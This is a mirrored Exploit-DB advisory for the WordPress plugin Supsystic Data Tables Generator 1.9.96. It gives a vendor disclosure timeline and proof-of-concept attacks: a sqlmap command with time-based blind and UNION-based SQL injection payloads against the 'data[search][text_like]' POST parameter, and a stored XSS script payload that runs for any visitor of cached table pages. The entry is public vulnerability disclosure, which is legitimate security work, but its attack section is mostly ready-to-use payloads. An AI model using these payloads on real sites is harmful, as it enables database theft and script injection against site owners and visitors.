bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1
exploit-db-mirror/exploits/php/webapps/49543.txt
Offensive Security 84533192ae DB: 2021-02-09 
19 changes to exploits/shellcodes

SmartFoxServer 2X 2.17.0 - God Mode Console Remote Code Execution
SmartFoxServer 2X 2.17.0 - Credentials Disclosure
Millewin 13.39.146.1 - Local Privilege Escalation
AMD Fuel Service - 'Fuel.service' Unquote Service Path
Microsoft Internet Explorer 11 32-bit - Use-After-Free
SmartFoxServer 2X 2.17.0 - God Mode Console WebSocket XSS
Jenzabar 9.2.2 - 'query' Reflected XSS.
WordPress Plugin Welcart e-Commerce 2.0.0 - 'search[order_column][0]' SQL injection
WordPress Plugin Supsystic Ultimate Maps 1.1.12 - 'sidx' SQL injection
WordPress Plugin Supsystic Pricing Table 1.8.7 - Multiple Vulnerabilities
YetiShare File Hosting Script 5.1.0 - 'url' Server-Side Request Forgery
Alt-N MDaemon webmail 20.0.0 - 'Contact name' Stored Cross Site Scripting (XSS)
Alt-N MDaemon webmail 20.0.0 - 'file name' Stored Cross Site Scripting (XSS)
WordPress Plugin Supsystic Newsletter 1.5.5 - 'sidx' SQL injection
WordPress Plugin Supsystic Membership 1.4.7 - 'sidx' SQL injection
WordPress Plugin Supsystic Digital Publications 1.6.9 - Multiple Vulnerabilities
WordPress Plugin Supsystic Data Tables Generator 1.9.96 - Multiple Vulnerabilities
WordPress Plugin Supsystic Contact Form 1.7.5 - Multiple Vulnerabilities
WordPress Plugin Supsystic Backup 2.3.9 - Local File Inclusion
2021-02-09 05:01:57 +00:00

60 lines
No EOL
2.7 KiB
Text
Raw Blame History

# Exploit Title: WordPress Plugin Supsystic Data Tables Generator 1.9.96 - Multiple Vulnerabilities
# Date: 24/07/2020
# Exploit Author: Erik David Martin
# Vendor Homepage: https://supsystic.com/
# Software Link: https://downloads.wordpress.org/plugin/data-tables-generator-by-supsystic.1.9.96.zip
# Category: Web Application
# Version: 1.9.96
# Tested on: Ubuntu 16.04.6 LTS / WordPress 5.4.2
# 25/07 2020: Vendor notified
# 27/07 2020: Vendor requested detailed information
# 27/07 2020: Information provided
# 07/08 2020: Nudged vendor. No reply
# 22/08 2020: Nudged vendor. No reply
# 04/10 2020: Nudged vendor. No reply
# 29/11 2020: WordPress Plugin Security team contacted
# 08/12 2020: Vulnerability fixed
##################################
SQLi
##################################
# 1. Description
The POST parameter "data[search][text_like]" does not sanitize user input when searching for data.
# 2. Proof of Concept (PoC)
Use ZAP/Burp to capture the web request when searching for data and save it to request.txt
Referer: http://192.168.0.49/wp-admin/admin.php?page=supsystic-tables
sqlmap -r request.txt --dbms=mysql -p data[search][text_like]
Parameter: data[search][text_like] (POST)
Type: time-based blind
Payload: route[module]=tables&route[action]=getListForTbl&route[nonce]=5fc3d66b71&data[search][text_like]=t' AND (SELECT 4736 FROM (SELECT(SLEEP(5)))iAJy) AND 'iAVl'='iAVl&data[_search]=false&data[nd]=1595781752940&data[rows]=10&data[page]=1&data[sidx]=id&data[sord]=desc&action=supsystic-tables
Type: UNION query
Payload: route[module]=tables&route[action]=getListForTbl&route[nonce]=5fc3d66b71&data[search][text_like]=t' UNION ALL SELECT CONCAT(0x7170707871,0x487a436e5175474a64617446465349535248737249775445424671545a557367704b61424e6d6545,0x7178786b71),NULL-- -&data[_search]=false&data[nd]=1595781752940&data[rows]=10&data[page]=1&data[sidx]=id&data[sord]=desc&action=supsystic-tables
##################################
Stored XSS
##################################
# 1. Description
The "Editor" tab under the "Tables" section is vulnerable to stored XSS. It is possible to store XSS in all input fields as the code does not sanitize any of the user input.
# 2. Proof of Concept (PoC)
Enter the following payload into any input field: "><script>alert(1)</script><!--'
The payload is stored in the document and executes whenever a user visits the "Settings" tab or the document itself.
The document is also cached by the plugin. Therefore, the payload can also be executed by any unauthenticated user visting http://192.168.0.49/wp-content/uploads/supsystic-tables/cache/tables/[YOUR TABLE NUMBER]
Reference in a new issue View git blame Copy permalink